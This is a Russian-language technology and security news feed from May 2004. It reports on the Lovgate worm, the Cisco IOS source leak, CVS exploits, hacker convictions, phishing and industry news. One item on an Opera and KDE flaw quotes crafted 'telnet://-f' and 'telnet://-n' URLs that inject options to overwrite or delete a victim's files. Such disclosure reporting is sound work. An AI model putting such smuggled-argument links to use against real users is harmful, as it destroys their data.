Исследователи McAfee центра AVERT (Anti-Virus Emergency Response Team) увеличили риск атаки червя Lovgate.ab до "среднего", после того как получили более сотни экземпляров вирусов в первые несколько часов после обнаружения. Lovgate распространяется через e-mail как .zip, .exe, .scr, .pif, .cmd, или .bat файл. После того как Lovgate инфицирует компьютер, он открывает доступ к локальным дискам, делая их доступными для удаленных пользователей. Вирус также устанавливает бек-дор (backdoor), пытается скопировать себя на удаленные расшаренные диски, и создает на инфицированном компьютере и расшаривает папку под именем 'MEDIA'. Червь также добавляет себя в реестр для автоматического запуска при загрузке и пытается закрыть антивирусные программы.
vnunet.com

21/05/2004 15:15 Италия одобрила закон против пользователей P2P сетей
Итальянский парламент одобрил своим голосованием закон расценивающий незаконную пересылку материалов, защищенных копирайтом, в или из Интернет, без разрешенимя правообладателя, как уголовное приступление, предусматривающее тюремное заключение сроком до трех лет. Итальянское законодательство в области авторского права, датированное 1941 г., ранее противодействовало пиратам получать материальную выгоду от незаконного копирования. Сейчас же закон делает уголовным приступлением сам факт копирования,наказанием за нарушение которого в зависимости от степени могут служить штраф в размере $185 - $1240, тюремное заключение от шести месяцев до трех лет и конфискация ПО и оборудувания. Итальянский сенат принял закон несмотря на то, что партия Lista Prodi воздержалась, а зеленые и коммунисты не голосовали, хотя сенат согласился рассмотреть еще раз вопрос о мере присечения налагаемой этим законом.
theregister.co.uk

21/05/2004 13:44 Обзор дистрибутива Fedora Core 2
Ранее мы сообщали о выходе нового дистрибутива Linux от Red Hat под названием Fedora Core 2. На сайте, посвящённом обзору различных событий из мира Linux сделан первый обзор, посвящённый новому дистрибутиву. Обзор подготовлен одним из редакторов онлайнового ресурса Rich Hughes. Если рассмотреть вкратце выводы, к которым пришёл автор, то можно констатировать следующее. Из плюсов отмечен хорошо организованный процесс инсталляции, достаточно высокое быстродействие, неплохой внешний вид графического интерфейса, не перегруженного графикой. Тем не менее (на взгляд автора) дистрибутив не лишён и недостатков. В первую очередь это касается недостатка документации (автор смог найти документацию только для Red Hat 9). Также отмечаются нескоторые неудобства при работе с менеджерами пакетов, неработоспособность некоторых компонентов дистрибутива ( в частности, пишется о неработоспособности системы обновлений up2date). В лёгкости использования автор выставил 3 балла по 5-бальной системе. В сумме дистрибутив набрал 13 очков из 20 возможных. Хотелось бы заметить, что все подобные обзоры и оценки достаточно субъективны и несут в себе личные пристрастия и вкусы человека, который делает подобный обзор.
Обзор Fedora Core 2

21/05/2004 13:08 «Мошеннический дуэт» признали виновным
В среду 19 мая Федеральным Судом округа Вашингтон по обвинению в организации деятельности высококлассной хакерской команды, известной как «Мошеннический Дуэт» ("The Deceptive Duo"), признан виновным житель Флориды Бенджиамин Старк. В своем признании прокурору 22-летний Бенджиамин Старк сознался во взломе 11 компьютерных сетей, принадлежащих 9 правительственным ведомствам США и частным коммерческим компаниям. Теперь ему грозит от 24 до 30 месяцев тюрьмы. «Мошеннический Дуэт» привлек внимание общественности в апреле 2002 года, уничтожив правительственный web-сайт, сопровождая взлом патриотическим лозунгом, в котором хакеры описывали себя, как граждан, призванных защитить страну от кибертеррористов путем выявления уязвимостей в системе национальной критической инфраструктуры. "Усовершенствуйте систему безопасности, пока иностранные враги не заставили вас это сделать!" - гласили надписи на месте удаленного сайта. - В такое время, как сейчас, мы не можем рисковать возможностью подрыва нашего государства иностранными врагами". Такие надписи, как правило, сопровождались графическим изображением двух пистолетов на фоне изорванного Американского флага. Федеральный прокурор Джон Карлин (John Carlin) отказался комментировать мотивы преступников, однако заявил, что в данном случае мотивы хакеров не имеют никакого значения. В ходе слушаний Старк признался, что, взламывая системы Федеральной администрации по делам авиации, Федеральной администрации путей и сообщений, Службы гражданской обороны, Департамента охраны здоровья, Национального Департамента энергетики, Командования ВВС, Пресс-службы ВВС и нескольких частных компаний (Dynamic Systems Inc., Midwest Express), работал в дуэте с партнером (имя которого он не называет). Взломав сервер Федеральной администрации по делам авиации, дуэт запустил рассылку сообщений с информацией о пассажирах в несколько аэропортов. Так, вместе с именем пассажира, проходящего контроль безопасности, предоставлялись ложные сведения о перевозе им оружия, взрывчатых веществ, и химических препаратов. Во время своего другого вторжения "парочка" продемонстрировала доступ к базе данных паспортов, номеров социального страхования и другой персональной информации. Каждое вторжение «Дуэта» причиняло ущерб от 1 до 15 тысяч долларов, кроме случая со взломом сервера компании Midwest Express, который стоил компании $ 57 500. Тем не менее, признание Старка не содержит ни слова о том, что он будет свидетельствовать против своего партнера - подозреваемого 20-летнего Роберта Литтла (Robert Lyttle), известного "уничтожителя" web-сайтов, арестованного ФБР во время операции по задержанию Старка. Литтлу еще не предъявлено обвинение, а если и будет предъявлено, то, по заявлению его адвоката, он докажет, что действия «Дуэта» - высокий порыв молодых людей по поводу предупреждения террористических атак на информационную инфраструктуру. При этом защита абсолютно уверена в снятии всех обвинений по этому делу. В дополнение Старк признался и в "сольных" атаках. В феврале 2001 года он уничтожил сайт Инженерных Войск США, действовав под псевдонимом "The-Rev". А в декабре того же года в Интернет-чате за 250 долларов он продал номера 447 краденых кредитных карт агенту ФБР работавшему под прикрытием.
crime-research.ru

21/05/2004 11:57 Эксплоиты уязвимости в CVS
Stefan Esser от имени немецкой компании e-matters на днях сообщил об обнаружении уязвимости в системе управления исходными кодами, популярной в мире открытых систем CVS (Concurrent Versions System). Cуть уязвимости заключается в некорректной обработки входных строк. Удаленный пользователь может заставить функцию быть вызванной несколько раз, включая некоторые символы в строку входа. В результате возможно переполнение кучи в стеке с дальнейшей перезаписью памяти произвольными данными и выполнение произвольного кода (удалённо). Эксплоиты не заставили себя долго ждать. Первый эксплоит был выпущен для ОС Linux, FreeBSD (хотя, по описанию, должен работать и в Solaris). Второй был написан специально под ОС Solaris. Кстати, хотелось бы заметить, что подобная уязвимость была обнаружена e-matters и в конкурирующей системе Subversion.
Эксплоит для Linux/FreeBSD
Эксплоит для Solaris

21/05/2004 11:11 Червь Lovegate научился отвечать на письма
Компания Network Associates обнаружила новую версию вредоносной программы Lovegate, отличающуюся от предшествующих модификаций гораздо более разнообразными возможностями в плане размножения и маскировки. Червь Lovegate.ab распространяется по электронной почте и через незащищенные сетевые ресурсы. Многократно упакованный файл вируса имеет размер 108544 байта. При проникновении в систему вредоносная программа создает свои многочисленные копии в директории Windows, а также в корневом каталоге жесткого диска С. Далее проводятся модификация реестра с целью автоматического запуска червя при загрузке ОС и удаление из памяти ряда антивирусных приложений. При отправке инфицированных писем вирус использует собственный SMTP-сервер. Причем червь может не просто создавать новые сообщения, фальсифицируя обратный адрес, но и отвечать на непрочитанные послания, хранящиеся в папках программ Microsoft Outlook и Outlook Express. В последнем случае поле тема остается неизменным, что позволяет ввести в заблуждение автора письма. Вложенные файлы могут иметь расширения EXE, SCR, PIF, CMD, BAT, кроме того, Lovegate.ab способен прятаться внутри ZIP-архивов. Наконец, вредоносная программа пытается проникнуть в пиринговые сети, скопировав себя в общедоступные директории под видом картинок или крэков популярных программ, например, You_Life.JPG.pif или WinZip v9.0 Beta Build 5480 crack.exe.
Источник

21/05/2004 10:58 Немецких госчиновников завалили спамом
Более полумиллиона спамовых писем вынудили несколько тысяч немецких государственных чиновников закрыть свои почтовые серверы. «Наша система электронной почты была полностью парализована», - приводит агентство Reuters слова сотрудников одного из министерств ФРГ. Еще один немецкий чиновник выразил уверенность в том, что сети министерств и федеральной канцелярии были атакованы спамерами в минувшие выходные. Результатом спамового потока стало то, что электронные письма стали приходить с задержкой в несколько дней или не доходили вообще. По информации, предоставленной федеральным агентством ФРГ по вопросам компьютерной безопасности, в адрес правительственных структур пришло приблизительно 510 тысяч спамерских посланий. Точную причину столь резкого увеличения почтового потока установить пока не удалось. Представители властей выразили надежду на то, что нормальная работа серверов возобновится к 21 мая. Инцидент произошел в период, когда депутаты бундестага приступили к активному обсуждению законов о борьбе со спамом.
Источник

21/05/2004 10:32 Эндрю Таненбаум поддержал Линуса Торвальдса в вопросе авторства Linux
Согласно ранее опубликованному отчёту компании Alexis de Tocqueville Institution со штатом 14 человек, утверждается, что Линус Торвальдс (создавший в 1991 г. знаменитую ОС с открытым исходным кодом Linux) не является фактическим автором этой ОС, а (по утверждениям компании) полностью позаимствовал исходный код у операционной системы Minix, существовавшей в то время. Подобные выводы сделаны из следующих посылок: «вызывает большие сомнения, что Линус, тогда ещё студент, практически не имевший опыта разработки операционных систем», мог за считанные месяцы создать операционную систему. «Зачем тогда самые яркие бизнес-умы в истории технологии ПК с капиталом в сотни миллионов долларов лицензировали код Unix, если её было так легко написать с нуля при наличии минимальной помощи или опыта? Возможно ли, чтобы для создания операционной системы Unix было достаточно всего нескольких месяцев работы — и при этом даже не нужно было видеть исходный код?». Сам Линус ответил на этот отчёт: "«Я не списывал код Linux с кода Minix, — говорит он. — Я использовал Minix, когда писал Linux, но в той же мере, в какой вы используете Windows при написании своих колонок. Разве ваши статьи содержат исходный код Windows, раз вы пользовались Windows при их написании?». К Линусу присоединился не менее известный в мире программированию Эндрю Танненбаум (работавший вместе с Ритчи, Томпсоном над ОС UNIX), опубликовав отчёт под названием "Some Notes on the "Who wrote Linux". Kerfuffle, Release 1.4". «Утверждение Брауна, что люди 30 лет пытались и не смогли создать Unix-подобную систему, совершенный абсурд. Шесть разных людей сделали это независимо друг от друга. В науке считается важным выражать людям признательность за их идеи, и Линус, на мой взгляд, сделал это в гораздо меньшей степени, чем должен был, но это не имеет ничего общего с утверждением, будто Линус не писал Linux. Он не писал CTSS, и он не писал ни MULTICS, ни UNIX, ни MINIX, но Linux написал он. По-моему, Браун должен перед нами извиниться». Впрочем, нападки Alexis de Tocqueville Institution становятся вполне понятными, если учесть, что, согласно слухам в компьютерном мире эта компания финансируется Microsoft.
Статья Таненбаума

21/05/2004 10:07 Microsoft выпустила Office для Macintosh
В четверг началась официальная продажа последней версии пакета Microsoft Office для компьютеров Macintosh, производимых компанией Apple Computer Inc, сообщает агентство Reuters.
Во второй релиз Office 2004 для Macintosh вошли приложения для работы с почтой, текстами, таблицами и презентациями. Часть функций разработана специально для компьютеров Apple. Среди новых возможностей - улучшенные инструменты для составления диаграмм в Excel 2004, "умные кнопки" для управления автоматическими функциями в документах Word и Excel. В приложении PowerPoint появилась функция предпросмотра и чтения пометок. В то же время почтовая программа Entourage и текстовый редактор Word дизайном во многом повторяют соответствущие программы для Windows. В компании Microsoft пообещали совершенствовать пакет Office для Macintosh, которым, по некоторым оценкам, пользуются до 7 миллионов человек. Между тем производство приложения Internet Explorer для Macintosh будет сворачиваться. Компания Apple намерена продвигать на рынок собственный браузер под названием Safari, уточняет Reuters. Пакет Office для Macintosh будет стоить в розницу 400 долларов и 150 долларов для учебных заведений. Цена Professional edition составит около 500 долларов.
lenta.ru

20/05/2004 19:27 Акция Microsoft в России
Как написано на сайте компании Microsoft, c 1 марта по 30 июня 2004 года коммерческие организации могут бесплатно взять на тестирование сервер, с предустановленной операционной системой Windows Small Business Server 2003. Windows Small Business Server 2003 — пакет, содержащий ключевые серверные продукты Microsoft, включая Windows Server 2003 и Windows Small Business Server. Работает не более чем с 75 компьютерами. Для получения сервера надо обратиться к одному из партнёров Microsoft в ближайшем городе. При этом сам сервер выдаётся на 3 недели. Желающие ещё могут успеть. ;)
Подробности

20/05/2004 18:45 Украинский Антивирусный Центр запустил сервис UNA-Online
Украинский Антивирусный Центр, разработчик комплексных систем антивирусной защиты, сообщает о запуске сервиса UNA-Online. Теперь пользователи, не имеющие антивирусных программ, смогут проверить подозрительные файлы просто загрузив их на специальный сервер UNA-Online. Сервис UNA-Online является бесплатным, для проверки файлов не нужно устанавливать антивирусное ПО, а проверка файлов происходит максимально быстро, время проверки зависит только от скорости соединения с интернетом. Сервис работает 24 часа в сутки, 7 дней в неделю, проверка происходит на полных базах, включающих самые последние вирусы. Кроме того, форма сервиса UNA-Online доступна для установки на любом сайте. Для этого достаточно просто скопировать html-код и вставить его в собственную веб-страницу. Также был обновлен сервис Viruses TOP-10 — теперь веб-мастера могут выбрать один из 10 стилей оформления «Горячей десятки вирусов» либо создать свой собственный. Viruses TOP-10 — это информация о десяти наиболее распространённых вирусах по статистике «Украинского Антивирусного Центра», а также описание каждого из вирусов. Viruses TOP-10 составляется на основании статистических данных, полученных УАЦ на протяжении последней недели.
Адрес сервиса

20/05/2004 17:54 Symantec купила Brightmail
Symantec сообщила в среду, что она планирует потратить $370 млн. на приобретение Brightmail, фирму, занимающуюся разработкой утилит для блокирования спама и вирусов. Symantec прилагает усилия для развития своего хорошо известного продукта Norton AntiVirus, расширяя его возможности сопутствующим ПО, сервисами и железом. В последние два года компания сделала несколько подобных приобретений, включая SafeWeb и On Technology.
news.com.com

20/05/2004 14:22 Еще два почтовых сервиса, SPYMAC.com и Lycos, увеличивают размер ящиков до 1GB
Пока пишется множество статей о новом почтовом сервисе Google - "GMail", который предлагает пользователям бесплатно 1GB пространства под почту, реально очень небольшое количество людей пользуется GMail сейчас. Сервис продолжает находится в "бета"-стадии, или как сама компания назвала это состояние - "ограниченный тестовый период". Несмотря на это, маркетинговый ход Google уже сыграл свою роль на рынке. По сообщению theinquirer, еще два почтовых сервиса увеличивают размер ящиков до 1GB. Вчера сообщалось, что Lycos, ужаленный маркетинговой акцией Google, увеличит размер почтовых ящиков до 1GB. Как ожидается, Lycos Europe откроет свой почтовый сервис, который предоставит пользователям гигабайтное пространство для хранения кореспонденции. Скорее всего этому шагу, который британская компания несомненно сделала в ответ Google, вскоре последуют и другие страны. Google планирует запустить свой почтовый сервис в этом году. Основное отличие между двумя сервисами - Lycos взимает с пользователей плату $6.15 в месяц и не рассылает рекламу. Google планирует добавлять рекламное сообщение в письма пользователей и предоставлять сервис бесплатно. Сегодня theinquirer пишет о том, что сайт SPYMAC.com по-видимому тоже рещил вступить в "войну бесплатных почтовых сервисов" против GMail, и как и Lycos, теперь предлагает для бесплатных аккаунтов 1GB пространства под почтовый ящик, доступ к которому открыт по POP3 и через веб интерфейс.
TheInquirer о Lycos
TheInquirer о SPYMAC.com

20/05/2004 12:43 Некоторые детали о похищенных исходниках IOS.
Как пишет австралийский сайт LinuxWorld, стали известны некоторые подробности о похищенном исходном коде ОС IOS, выпускаемой CISCO. Как стало известно, скорее всего они были похищены с сервера под управлением OC Solaris в сети компании CISCO (после его взлома), а затем выложены на файл-сервере, принадлежащем университету Utrecht в Голландии. Об этом в интервью сайту сообщил Александр Антипов, эксперт по безопасности московской компании Positive Technologies (и, попутно, основатель и ведущий сайта securitylab.ru). Однако, пресс-секретарь CISCO отказался от каких-либо комментариев и заявил, что комапния в настоящий момент тесно сотрудничает с ФБР с целью обнаружения источников утечки кода. По адресу полученнного линка (ftp://ftp.phys.uu.nl) лежали некоторые файлы, однако сам сервер является свободно доступным FTP-сервером с возможностью размещения файлов, не превыющих 5 МБ. Тем временем на сайте компании IDG News Service были опубликованы другие исходные файлы IOS. В частности, были опубликованы файлы: snmp_chain.c, датированный 1993 г. с авторством Robert Widmer; http_auth.c, датированный 2002 г. с авторством Saravanan Agasaveeran; файлы этого же автора с исходными кодами API для работы с клиентоами и серверами по протоколу HTTP. CISCO подтвердила, что Saravanan Agasaveeran работал в подразделении Сан-Хосе (Калифорния) компании. Кроме того, в результате расследования исходных кодов было установлено, что они ведут к серверу iwan-view3.cisco.com, который принадлежит корпоративной сети CISCO. Сервер находился также под управлением ОС Sun. Файлы в директории исходников датироваными 2002 и 2003 г., окончательная дата - ноябрь прошлого года. Предполагается, что это может помочь в расследовании даты похищения файлов.
Полный текст

20/05/2004 12:06 Вышел дистрибутив Fedora Core 2
Cообщается о выходе давно ожидаемой версии свободно распространяемого дистрибутива Linux от Red Hat - Fedora Core 2. Основным (и давно ожидаемым) нововведением, является построение системы на базе ядра ветви 2.6 (в дистрибутив включена версия 2.6.5). Из остальных нововведений - SELinux, XFree86 заменен на X.org, Gnome 2.6, KDE 3.2.2, XFCE 4, gcc 3.4 и др.
Анонс

20/05/2004 11:39 Биллинговая система ФОРСАЖ
Компания “ФОРС — Центр разработки”, партнер корпорации Oracle в странах Центральной и Восточной Европы, объявляет о создании нового продукта – биллинговой системы ФОРСАЖ, предназначенной для осуществления расчетов за услуги проводной связи, VoIP, доступа в Интернет, коммунальных платежей и др., cообщает pcweek.ru. Система реализована в трехуровневой архитектуре с использованием технологии веб-сервисов на платформе СУБД Oracle 9i, Oracle 9i Application Server. Она может поставляться как в виде комплексного решения, так и арендоваться в качестве средства “удаленного биллинга”. В основе программного комплекса лежит универсальное расчетное ядро, благодаря которому можно легко дополнять систему модулями обработки данных новых типов. Такие функции, как ведение и конструирование сложных тарифных планов, генерация дополнительных документов, формирование начислений за разовые услуги, повышают эффективность и эргономичность системы. Новый продукт может быть интегрирован с CRM, ERP, SCM, а также с финансовыми и наследуемыми информационными системами, включая “1С:Бухгалтерия”. Независимость отдельных модулей придает биллинговой системе гибкость и позволяет избежать дублирования информации. Надежность и безопасность системы подтверждены тестовыми испытаниями, которые проводились на 32-разрядном 4-процессорном сервере на базе Intel Xeon MP c использованием технологии Hyper-Threading (KLONDIRE President 4000) и на 4-процессорном сервере G-Scale (с процессором Intel Itanium 2) компании Kraftway. В перспективе планируется поставлять биллинговую систему ФОРСАЖ не только как самостоятельный продукт, но и как полностью интегрированное решение на базе Xeon MP и Itanium 2.
Сайт производителя

20/05/2004 11:15 Путин подписал антихакерский указ
Президент России Владимир Путин подписал указ "О мерах по обеспечению информационной безопасности Российской Федерации в сфере международного информационного обмена", сообщает агентство РИА "Новости" со ссылкой на пресс-службу президента. Новый указ направлен, главным образом, на обеспечение надежной защиты от несанкционированных действий против российского сегмента интернета и, в первую очередь, сетевых ресурсов государственных органов. Речь идет о предотвращении возможных попыток компьютерного взлома и получения контроля над сетевыми ресурсами органов власти России с террористическим умыслом, сообщает агентство. В сообщении РИА "Новости" указывается также на то, что реализация указа "повысит устойчивость интернет-ресурсов органов власти России к воздействию активно распространяющихся сетевых компьютерных вирусов, способных нанести серьезный урон тем сферам государственной деятельности и экономики, где активно применяются компьютерные технологии". Указом предусматриваются меры, направленные на защиту сведений, составляющих государственную тайну, и служебной информации ограниченного распространения. В целом, указ имеет целью обеспечение дальнейшего устойчивого развития и модернизации российских государственных сетевых ресурсов.
rian.ru

20/05/2004 10:43 Google учит adware хорошим манерам
В стремлении обуздать бесчинства программ типа adware и spyware Google опубликовала проект кодекса производителя программного обеспечения для тех, кто разрабатывает ПО, загружаемое в компьютеры пользователей интернета. В руководящих принципах утверждается, что программное обеспечение должно следовать общим правилам вежливости: допускать возможность запрета его действий и не делать таких вещей, как выуживание персональной информации. Принципы программирования Google появились на фоне растущего интереса администраций штатов и федерального правительства к регулированию, а возможно и запрету adware и spyware. Штат Юта уже принял подобный закон, а Палата представителей США и Федеральная торговая комиссия недавно провели слушания по этому вопросу. По существу, шаг Google представляет собой оборонительную, самоограничительную меру, направленную на то, чтобы побудить индустрию массового программного обеспечения к поиску способа сделать программы spyware и adware приемлемыми. Google производит такие продукты для Windows, как Google Toolbar и Google Deskbar, которые передают в штаб-квартиру компании некоторую информацию о поведении пользователей в интернете. В результате принятия широких законов эти инструменты могут оказаться под запретом. А судя по статье, опубликованной в среду в The New York Times, в числе прочих своих предприятий Google делает ощутимую ставку и на настольный инструмент поиска, поддерживаемый рекламой. Принципы Google направлены также и на то, чтобы сконцентрировать критику на приложениях pop-up adware вроде тех, что создают WhenU и Claria (бывшая Gator). Они ставят перед поисковым гигантом, недавно подавшим заявку на первоначальное публичное размещение акций, две проблемы: во-первых, они могут запускать раздражающие всплывающие окна в то время, когда пользователь осуществляет поиск на веб-сайте Google; и во-вторых, Google Toolbar может не блокировать их всплывающие окна. В этом случае «в вашей системе преднамеренно или ненароком может появиться такая программа, как Gator Ads Network или Kazaa», — предупреждает Google пользователей своего Toolbar.
Подробности

20/05/2004 10:15 Yahoo предложила свой способ борьбы со спамом
Интернет-портал Yahoo Inc. во вторник заявил о том, что специалистами компании разработан новый стандарт электронных писем, который не позволит авторам массовых рассылок нежелательной почты (спама) отправлять почту, ставя в качестве адреса отправителя чужие e-mail - адреса, сообщает Reuters. Данная технология, в случае ее повсеместного распространения, упростит интернет-провайдерам блокирование нежелательных писем, занимающих обычно до двух третей почтового трафика. Стандарт, называемый DomainKeys, будет снабжать исходящие письма зашифрованной цифровой подписью. Аналогичной подписью будет снабжен сервер, отправляющий письмо. Таким образом, провайдеры смогут проверять подпись на входящих письмах и блокировать послания с поддельными адресами. Обычных пользователей данные изменения напрямую не затронут - вся работа по дешифровке и сличению подписи будет вестись на уровне провайдеров. Для того чтобы DomainKeys получила распространение, Yahoo готова позволить бесплатное использование технологии.
lenta.ru

19/05/2004 20:06 Интернет мошенничество растет с небывалой скоростью
Анти-"фишинговая" рабочая группа (Anti-Phishing Working Group - APWG), группа, занимающаяся расследованиями незаконных махинаций в интернете, сообщает о более чем 1100 случаев уникальных афер или мошеннuчеств, обнаруженных ею за апрель. Это число на 178% больше, чем в марте. А с февраля по март число жульничеств выросло только на 43% и в основном касалось финансовых услуг или розничных продаж. Citibank подвергся 475 атакам в апреле, eBay - 221 и PayPal - 135. APWG подтвердила свое предположение что "фишинговые" веб страницы являются товаром среди мошенников, также как спамеры торгуют e-mail адресами. Криминальные организации также используют интернет-аферы. Исследование, проведенное Gartner, показывает что как минимум 3% жульнических атак успешны, а значит, затрагивают 1.78 млн. взрослых пользователей.
infoworld.com

19/05/2004 19:47 Symantec обнаружила активность червя Kibuv.b
В понедельник Symantec обнаружила высокий уровень необычного трафика на TCP порту 5000, что означает вирусную активность. Черезмерно высокая активность на порту 5000 чаще всего свидетельствует о вирусной деятельности, говорит Alfred Huger вице-президент Symantec's virus watch group. В этот раз виновником оказался червяк Kibuv.b, который крайне активно распространялся по Интернету в конце прошлой неделе благодаря уязвимости в Windows Universal Plug and Play (UPnP) сервисе в Windows 98, Me, and XP. UPnP уязвимость была впервые обнаружена и пропатчена еще в 2001. "Kibuv.b пользуется очень давней уязвимостью," сказал Huger, "поэтому мы решили не объявлять критическое предупреждение в данный момент." Растущая активность на 5000 порту говорит о том что вирус получил хождение в Интернет. Патчи для UPnP уязвимости можно скачать на сайте Microsoft или через Windows Update сервис.
informationweek.securitypipeline.com

19/05/2004 19:46 Cisco Systems и IBM укрепляют сотрудничество в VoIP
Cisco Systems и IBM во вторник укрепили свое сотрудничество новой инициативой, целью которой являются интегрированные решения по передаче видео, звука и данных. Компании приняли решение о совместной разработке и планах по увеличению интеграци Cisco IP комуникационных продуктов с оборудованием и программым обеспечением IBM. В дополнение, Cisco планирует развернуть IBM Global Services в сторону системной интеграции и других услуг в сфере VoIP, заявил Рик Морган (Rick Moran), вице-президент по маркетингу продуктов и технологии Cisco. Одна из целей новой инициативы является интеграция существующих возможностей Cisco CallManager и IBM Lotus-серии, сказал Морган. Другие цели включают интеграцию Cisco Unity messaging software с Lotus Domino, интеграцию IBM Information Management DB с CallManager, и поддержку CallManager на IBM-ам xSeries x345, x306 и x345 dual CPU серверах. Все совместно разработанные продукты будут распространяться по обоим каналам, Cisco и IBM. По словам Моргана, появление новых предложений ожидается на рынке уже в конце лета. С помощью IBM Global Services, Cisco надеется оказать помощь своим клиентам по переходу от систем традиционной телефонии к VoIP, предоставляя необходимую совместимость со старыми приложениями, такими как CRM. Кроме того, IBM продолжает свой собственный аналог Cisco-вских VoIP продуктов, который на данный момент включает реализацию 20,000 Cisco IP phones. Новая инициатива показала укрепление долгосрочного альянса между двумя компаниями. В прошлом месяце Cisco и IBM объявили о том, что они вместе будут разрабатывать решения для дата-центров.
crn.com

19/05/2004 18:16 Доносчик на автора Sasser сам стал подозреваемым
Информатор, выведший полицию Германии на след автора червя Sasser, сам оказался подозреваемым в причастности к созданию вредоносной программы, сообщает сайт The Register со ссылкой на мюнхенский еженедельник Focus. Расследование в отношении Марля Б., предоставившего полиции сведения о 18-летнем Свене Яшане, лишает информатора шансов получить положенную ему долю вознаграждения компании Microsoft. «Если он был причастен к созданию Sasser, ему придется остаться с пустыми руками», - прокомментировал ситуацию пресс-секретарь офиса Microsoft в ФРГ Томас Баумгаэртнер (Thomas Baumgaertner). Свен Яшан был арестован по подозрению в создании интернет-червя Sasser в городке Ваффензен 7 мая. Спустя некоторое время он признал себя автором Sasser, а также первой версии червя NetSky. Против Яшана, по всей видимости, будут выдвинуты обвинения в компьютерном вредительстве. До принятия судебного решения вирусописатель отпущен под залог. По словам прокурора Гельмута Трентманна, признание Яшана приблизит начало рассмотрения дела о Sasser в суде.
Источник

19/05/2004 13:19 Южноафриканский вирусописатель парализовал работу торговой сети
32-летний житель южноафриканского Йоханнесбурга Беренд Говард признан виновным в установке вредоносной программы на компьютеры торговой компании Edgars, сообщает сайт газеты Sunday Times. Согласно заявлению представителей потерпевшей стороны, вирус поразил около 700 магазинов торговой сети, а общий ущерб от действий Говарда составил около 20 миллионов южноафриканских рандов. Вредоносная программа, нанесшая ущерб Edgars, была создана и размещена на главном сервере компании в апреле-мае 1999 года. Результатом ее действия стала практически полная остановка автоматизированной работы торговой сети. Жесткие диски компьютеров оказались повреждены, данные о 80% товаров исчезли, и все сведения о них сотрудникам приходилось вводить вручную. Для восстановления работоспособности сети руководство Edgars привлекло 30 специалистов. В ходе внутреннего расследования была выявлена причастность Говарда, некоторое время работавшего в компании, к выведению сети из строя. Представление в суде свидетельств, способствующих смягчению приговора Говарду, намечено на 29 июля.
Источник

19/05/2004 13:01 Корейские пользователи интернета только и делают, что меняются файлами
Корейский телекомуникационный гигант KT Corp. провел исследование распределения интернет-трафика между различными онлайновыми сервисами. Как выяснилось, примерно 89% передаваемой информации приходится на файловый обмен посредством пиринговых сетей. Среди наиболее популярных файлообменных сетей присутствуют как известные во всем мире eDonkey и Gnutella, так и корейская сеть Soribada. Что касается обычного веб-серфинга, то на его долю приходится лишь 4,52% трафика. Это не означает, что корейцы мало гуляют в интеренте. Дело в том, что размеры HTML-страниц и мультимедийных файлов просто несопоставимы. Отсюда и разница в доле трафика. Интересно, что 20% самых активных пользователей интернета в Южной Корее генерируют 72% трафика. В настоящее время около двух третей корейских домохозяйств имеют широкополосные подключения к интернету. Распространение быстрого интернета привело к тому, что объем трафика в сети KT вырос с 49,4 Гбайт/с в 2001 году до 181 Гбайт/с - в 2003 г.. При этом объемы информации, передаваемой через интернет, продолжают непрерывно расти.
compulenta.ru

19/05/2004 12:58 Серьезная уязвимость в KDE и браузере Opera
Компания iDefense, специализирующаяся на вопросах компьютерной безопасности, сообщила об обнаружении серьезной уязвимости в "самом быстром на Земле" браузере Opera (версии 7.23 и некоторых более ранних) для операционных систем Windows, Mac OS и Linux. Проблема связана с неправильной обработкой строк, содержащих URL для протоколов telnet, rlogin, ssh и mailto. Дело в том, что браузер Opera не проверяет такие ссылки на предмет наличия в их начале символа "-", посредством которого злоумышленники могут передать на компьютер-жертву параметры запуска команд. В результате, хакеры, воспользовавшись данной дырой, получают возможность без проблем создать на удаленной машине произвольные файлы или уничтожить какие-либо данные. Для этого необходимо лишь, чтобы пользователь щелкнул по составленной определенным образом ссылке. Например, последовательность "telnet://-fFileName" приводит к созданию или перезаписи файла с именем FileName в директории браузера Opera. Тогда как при помощи URL "telnet://-nFilename" можно уничтожить файл в домашнем каталоге пользователя.Примечательно, что аналогичная уязвимость была найдена и в популярном менеджере рабочего стола для Unix-совместимых операционных систем KDE. Причем ошибка содержится во всех без исключения версиях KDE вплоть до 3.2.2. Впрочем, патчи для дыр уже выпущены.
compulenta.ru

19/05/2004 12:44 Европа делает ставку на квантовую криптографию
Европейские страны намереваются вплотную заняться задачей по внедрению квантовой криптографии при обмене информацией через интернет. На соответствующие исследования и конструкторские разработки в течение ближайших четырех лет будет выделено 13 млн. долларов США. В работах будут участвовать специалисты в области квантовой физики, криптографии, разработки программного обеспечения и создания сетей обмена информации из целого ряда стран. Это Великобритания, Австрия, Бельгия, Дания, Франция, Германия, Италия, Швеция, Швейцария, а также Канада и Россия. В течение первых четырех лет работы планируется наметить наиболее перспективные направления исследований, а затем заняться их практической реализацией. Пока завершить разработку европейской системы квантовой криптографии планируется в течение четырех лет, но не исключено, что на практике для решения данной задачи понадобится вдвое больший срок. Напомним, что квантовая криптография считается сейчас чуть ли не абсолютно надежным способом шифрования. Для шифрования информации в этом случае используются фотоны, поляризация которых задает значение бита: 1 или 0. Любая попытка перехвата фотона изменит его поляризацию, что не может пройти незамеченным для лиц, ведущих обмен зашифрованными данными. За работы над квантовой криптографией в Европе взялись в связи с созданием Соединенными Штатами при поддержке Великобритании, Австралии, Новой Зеландии и Канады системы Echelon, которая предназначена для перехвата информации, передаваемой в цифровых сетях связи. В Европе справедливо опасаются, что Echelon может использоваться не только для борьбы с мировым терроризмом, но и для промышленного шпионажа в интересах экономики владельца системы, то есть США.
compulenta.ru

19/05/2004 12:25 Клиенты Ситибанка стали первыми в России жертвами 'фишинга'
Руководство Ситибанка во вторник распространило заявление, в котором сообщило, что многие клиенты банка могли стать жертвами массовой рассылки электронных писем, отправители которых от имени Ситибанка просили владельцев пластиковых карт уточнить личные данные. В письмах содержалась ссылка на фальшивый сайт банка, на котором посетителям предлагалось ввести номер карты и пин-код. В России это первый случай подобного мошенничества.
lenta.ru

19/05/2004 10:27 На Голиафа Microsoft Office посягают новые конкуренты
